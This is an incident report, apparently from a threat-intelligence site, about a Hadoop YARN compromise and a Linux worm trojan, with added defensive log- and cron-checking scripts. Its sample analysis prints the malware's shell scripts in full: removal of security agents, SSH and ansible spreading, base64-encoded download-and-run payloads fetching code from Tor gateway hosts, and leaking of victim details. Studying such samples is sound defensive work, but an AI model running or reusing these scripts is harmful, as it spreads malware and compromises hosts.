Intrusion | Attacked, looking for attribution
A production-network host was compromised; one trojan dug out. Reward ¥1000
微步情报局 2019-11-13 12:48:08 1731 views
Intelligence submitted by:
Anonymous user
Intelligence summary:
Analysis and investigation:

1. The firewall raised a traffic alert for a web server in the production network. Investigating on the host with the alert details, we found the trojan executable /home/.systemd-init, created on 2019-10-09.

2. The trojan shown below was downloading and executing a further trojan; the method used is to decode base64-encoded data and execute it.

3. The trojan's scheduled task is shown below; it runs the trojan program .systemd-init once every hour.

4. On the infected system we found traces of exploitation of the Hadoop YARN unauthorized-access vulnerability.

5. The corresponding exploitation logs follow; they show the attacker using the dr.who account to create malicious Hadoop container instances.

6. The attacker used the dr.who user, and the target IP addresses were other machines in the internal network.

7. The trojan program found on systems in the internal network runs under the process name tracepath.

8. It is scanning port 8088 across the internal network; only a small number of the IPs scanning port 8088 were captured here, and many more follow below.

9. Because the first infected machine kept no logs recording the attacker's source IP, the source of the attack cannot be determined with certainty. However, on another machine in the internal network we could see scanning records for the Hadoop YARN vulnerability on internal port 8088, so we infer that this machine carried out the attacks against the other Hadoop-equipped machines in the internal network.
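As an added defender-side example (not part of the submitter's report): the YARN ResourceManager audit log is where the dr.who submissions described in steps 5 and 6 are recorded, and grouping them by source IP identifies the internal pivot host that step 9 had to infer from scanning records. The log lines below are constructed in the RMAuditLogger key=value shape, with invented IPs and application IDs.

```shell
#!/bin/sh
# Added example (not from the report): find application submissions made as
# "dr.who", the identity Hadoop assigns to unauthenticated web/REST callers,
# in a YARN ResourceManager audit log. RMAuditLogger lines carry key=value
# fields (USER= IP= OPERATION= TARGET= RESULT= APPID=); the sample below is
# constructed in that shape, with invented IPs and application IDs.

# Usage: yarn_drwho_submits <rm-audit-log>
# Prints "<source-ip> <appid>" for every successful dr.who submission.
yarn_drwho_submits() {
    awk '
        /USER=dr\.who/ && /OPERATION=Submit Application Request/ && /RESULT=SUCCESS/ {
            ip = ""; app = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^IP=/)    ip  = substr($i, 4)
                if ($i ~ /^APPID=/) app = substr($i, 7)
            }
            print ip, app
        }' "$1"
}

# Usage: yarn_drwho_sources <rm-audit-log>
# Prints "<source-ip> <count>": the hosts driving the dr.who submissions,
# i.e. the internal pivot box the report had to infer from scanning records.
yarn_drwho_sources() {
    yarn_drwho_submits "$1" | awk '{ n[$1]++ } END { for (ip in n) print ip, n[ip] }'
}

# Constructed sample log: one legitimate submit by a service account, then
# two successful and one failed dr.who submit from the same internal host.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
2019-10-09 03:12:41,102 INFO resourcemanager.RMAuditLogger: USER=hive IP=10.0.0.5 OPERATION=Submit Application Request TARGET=ClientRMService RESULT=SUCCESS APPID=application_1570000000000_0001
2019-10-09 03:15:07,559 INFO resourcemanager.RMAuditLogger: USER=dr.who IP=10.0.0.23 OPERATION=Submit Application Request TARGET=ClientRMService RESULT=SUCCESS APPID=application_1570000000000_0002
2019-10-09 03:15:09,001 INFO resourcemanager.RMAuditLogger: USER=dr.who IP=10.0.0.23 OPERATION=Submit Application Request TARGET=ClientRMService RESULT=FAILURE APPID=application_1570000000000_0003
2019-10-09 03:16:30,774 INFO resourcemanager.RMAuditLogger: USER=dr.who IP=10.0.0.23 OPERATION=Submit Application Request TARGET=ClientRMService RESULT=SUCCESS APPID=application_1570000000000_0004
EOF

yarn_drwho_submits "$SAMPLE_LOG"
yarn_drwho_sources "$SAMPLE_LOG"
```

Any dr.who submission on a cluster that does not intentionally expose an unauthenticated ResourceManager is worth treating as the step-5 finding; the source IP column is the first lead for lateral-movement tracing.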

 

Sample analysis:

The trojan is packed with UPX, and its functionality falls into three parts. The first is an initialisation program, whose main jobs are to clean out other trojans and uninstall existing security software. The second is a propagation program, which uses the private keys present on the system to log in to any hosts it can reach and run a command that downloads and executes the trojan. The third is a bot program, which has internal-network scanning and vulnerability exploitation capabilities.


1. From our own dynamic analysis of this trojan, the following is the extracted initialisation script the attacker uses to clean out other malware:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
# Kill rival miners' processes and remove their cron persistence
find ~/.ddg/*|xargs fuser -k;fuser -k /tmp/.X11-lock /tmp/.X1-lock /tmp/.X1M-unix
find /etc/cron*|xargs chattr -i;grep -RE "(wget|curl|systemd-login)" /etc/cron.*|cut -f 1 -d :|xargs rm -f
crontab -l |sed '/wget/d'|sed '/curl/d'|sed '/systemd-login/d'|sed '/tmp00/d'|sed '/\upd/d'|sed '/X13/d'|sed '/X17/d'|sed '/firefoxcatche/d'|sed '/nullcache/d'|crontab -
# Process names of competing malware families and of cloud host-security agents
pkill -9 -f "./cron|8220|aecc2ec|aegis_|AliHids|AliYunDun|aliyun-service|azipl|cr.sh|cronds|crun|cryptonight|ddgs|fs-manager|finJG|havegeds|hashfish|hwlh3wlh44lh|HT8s|gf128mul|java-c|kerberods|khugepageds|kintegrityds|kpsmouseds|kthrotlds|kw0|kworkerds|kworkre|kwroker|mewrs|miner|mr.sh|muhsti|mygit|networkservice|orgfs|pastebin|qW3xT|qwefdas|sleep|stratum|sustes|sustse|sysguard|t00ls|thisxxs|/tmp/ddgs|/tmp/java|/tmp/udevs|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|X13-unix|X17-unix|zer0"
rm -rf ~/.wget-* ~/.tmp00 /tmp/.X13-unix /tmp/.X17-unix /tmp/.X11-lock /tmp/.X1-lock /tmp/.X1M-unix ~/.systemd-login /etc/cron.d/systemd /lib/systemd/systemd-login;echo 1 > /tmp/.XIMunix;echo 1 > /tmp/.XImunix;
# Rewrite /etc/hosts so that rivals' download sources resolve nowhere
grep -q tor2w /etc/hosts && sed -i '/tor2w/d' /etc/hosts
grep -q intel /etc/hosts && sed -i '/intel/d' /etc/hosts
grep -q "0.0.0.0 pastebin.com" /etc/hosts || echo "0.0.0.0 pastebin.com" >>/etc/hosts
grep -q "0.0.0.0 lsd.systemten.org" /etc/hosts || echo "0.0.0.0 lsd.systemten.org"


2. The main purpose of this script is to use SSH to log in to every host that can be reached using the system's known_hosts file, shell history and similar sources, and make them download the trojan; it also uses the ansible tool for batch deployment of the trojan download, and downloads the bot:

exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
w="wget -t1 -T180 -qU- -O- --no-check-certificate"
c="curl -m180 -fsSLkA-"
# Key-only SSH login (no password prompt, host keys accepted blindly); the base64 payload is decoded and run on the remote host
xssh() {
ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ****Pi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KeCgpIHsKZj0vaW50CmQ9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQiICIpCndnZXQgLXQxIC1UMTgwIC1xVS0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSRmIC1PJGQgfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSRmIC1vJGQKY2htb2QgK3ggJGQ7JGQ7cm0gLWYgJGQKfQpmb3IgaCBpbiB0b3Iyd2ViLmlvIGQyd2ViLm9yZyBvbmlvbi5pbi5uZXQgb25pb24uZ2xhc3Mgb25pb24ubW4gb25pb24udG8gb25pb24uc2ggb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wKS9pbzsgdGhlbgp4IGludGVsYmFnam9wN256bTUuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash'
}
# Fetch the bot; the victim's public IP, user, architecture, hostname and crontab are leaked in the Referer header
x1() {
f=/bot
d=$(curl -4fsSLk ip.sb||wget -4qO- ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(crontab -l|base64 -w0)
$w --referer=$d $1$f || $c -e$d $1$f
}
# Fetch and run the scanner unless a process named tracepath is already present
x2() {
if ! netstat -antp |grep tracepath; then
f=/trc
d=./$(date|md5sum|cut -f1 -d" ")
wget -t1 -T180 -qU- --no-check-certificate $1$f -O$d || $c $1$f -o$d
chmod +x $d;$d;rm -f $d
fi
}
# Spread through configuration-management tools and through every IP found in shell history, /etc/hosts and known_hosts
x3() {
ansible all -m shell -a 'echo ***ZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KeCgpIHsKZj0vaW50CmQ9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQiICIpCndnZXQgLXQxIC1UMTgwIC1xVS0gLS1uby1jaGVjay1jZXJ0aWZpY2F0ZSAkMSRmIC1PJGQgfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSRmIC1vJGQKY2htb2QgK3ggJGQ7JGQ7cm0gLWYgJGQKfQpmb3IgaCBpbiB0b3Iyd2ViLmlvIGQyd2ViLm9yZyBvbmlvbi5pbi5uZXQgb25pb24uZ2xhc3Mgb25pb24ubW4gb25pb24udG8gb25pb24uc2ggb25pb24ud3MKZG8KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wKS9pbzsgdGhlbgp4IGludGVsYmFnam9wN256bTUuJGgKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash'
knife ssh 'name:*' 'echo ***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|base64 -d|bash'
salt '*' cmd.run 'echo ***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|base64 -d|bash'
hosts=$(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |awk -F: {'print $2'}|sort|uniq;awk {'print $1'} $HOME/.ssh/known_hosts|sort|uniq|grep -v =|sort|uniq)
for h in $hosts;do xssh root $h; xssh $USER $h & done
}
# Make sure a downloader exists, then remove the Alibaba Cloud and Tencent Cloud host-security agents
x4() {
curl -V || apt-get -y install curl || yum -y install curl
wget -V || apt-get -y install wget || yum -y install wget
$w update.aegis.aliyun.com/download/uninstall.sh|bash
$w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
}
x1 ***
x2 ***
x3
x4


# Initialisation script executed on the victim host after the SSH login
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
x() {
f=/int
d=./$(date|md5sum|cut -f1 -d" ")
# Try several different dark-web gateways to download the trojan
wget -t1 -T180 -qU- --no-check-certificate $1$f -O$d || curl -m180 -fsSLkA- $1$f -o$d
chmod +x $d;$d;rm -f $d
}
***
# do: iterate over the different sources
if ! ls /proc/$(cat /tmp/.X11-unix/0)/io; then
x intelbagjop7nzm5.$h  # join the source onto the hidden-service name and download the trojan
else
break
fi
done


3. Once the bot has downloaded successfully, it scans port 8500 across the internal network and attempts exploitation; after a successful exploitation the cycle above starts again.

[pid 12246] connect(1, {sa_family=AF_INET, sin_port=htons(8500), sin_addr=inet_addr("192.168.0.1")}, 16) = -1 EINPROGRESS (Operation now in progress)
[pid 12249] connect(2, {sa_family=AF_INET, sin_port=htons(8500), sin_addr=inet_addr("192.168.0.2")}, 16) = -1 EINPROGRESS (Operation now in progress)
[pid 12251] connect(3, {sa_family=AF_INET, sin_port=htons(8500), sin_addr=inet_addr("192.168.0.3")}, 16) = -1 EINPROGRESS (Operation now in progress)
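As an added host-triage example (not code from the report or from the sample): the two checks below look for the footprints described above, the hourly base64-decoding cron job from step 3 and the half-open internal scanning of ports 8088 (step 8) and 8500 (the bot's strace output) by a process posing as tracepath. Both functions read a captured text dump (`crontab -l`, `netstat -antp`) so they can be run against a live host or against the constructed samples embedded at the bottom; the cron lines and netstat rows are invented for the demonstration.

```shell
#!/bin/sh
# Added triage example (not from the report or the sample): read-only checks
# for the persistence and scanning behaviour analysed above. Each function
# takes a captured text dump so it runs against a live host or a test file.

# Cron entries that decode base64 into a shell, pipe a downloader into a
# shell, or run the hidden .systemd-init dropper (the sample's hourly job).
cron_findings() {
    grep -nE 'base64 *-d *[|] *(ba)?sh|(wget|curl) [^|]*[|] *(ba)?sh|/\.systemd-init' "$1" \
        | sed 's/^/FINDING: cron line /'
}

# Internal scanning: one process with half-open (SYN_SENT) connections to
# port 8500 or 8088 on at least $2 distinct peers. Input is "netstat -antp"
# output (proto recvq sendq local foreign state pid/program); IPv4 assumed.
scan_findings() {
    awk -v min="$2" '
        $6 == "SYN_SENT" && $5 ~ /:(8088|8500)$/ {
            port = $5; sub(/.*:/, "", port)
            key = $7 " -> port " port
            if (!seen[key, $5]++) peers[key]++
        }
        END { for (k in peers) if (peers[k] >= min) print "FINDING: " k " (" peers[k] " distinct peers, SYN_SENT)" }
    ' "$1"
}

# Constructed samples: a benign cron line, the report-style hourly dropper
# line, a base64-to-bash line, one legitimate connection and three half-open
# connections to port 8500 from a process named tracepath.
SAMPLE_CRON=$(mktemp); SAMPLE_NETSTAT=$(mktemp)
cat > "$SAMPLE_CRON" <<'EOF'
30 2 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
0 * * * * /home/.systemd-init >/dev/null 2>&1
*/10 * * * * echo ZWNobyBoaQo=|base64 -d|bash
EOF
cat > "$SAMPLE_NETSTAT" <<'EOF'
tcp        0      0 10.0.0.23:22            10.0.0.5:51522          ESTABLISHED 911/sshd
tcp        0      1 10.0.0.23:41234         192.168.0.1:8500        SYN_SENT    12246/tracepath
tcp        0      1 10.0.0.23:41235         192.168.0.2:8500        SYN_SENT    12246/tracepath
tcp        0      1 10.0.0.23:41236         192.168.0.3:8500        SYN_SENT    12246/tracepath
EOF

cron_findings "$SAMPLE_CRON"
scan_findings "$SAMPLE_NETSTAT" 3
```

The peer threshold is deliberately a parameter: a genuine tracepath run has one destination, so even a low threshold separates the bot's sweep from legitimate use.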



Target industry:
IT industry

Ownership of intelligence awarded under the reward programme belongs to 微步在线.

微步在线 has the right to use, edit, store, copy, modify, create derivative works from, communicate, publish, publicly perform and publicly display this intelligence.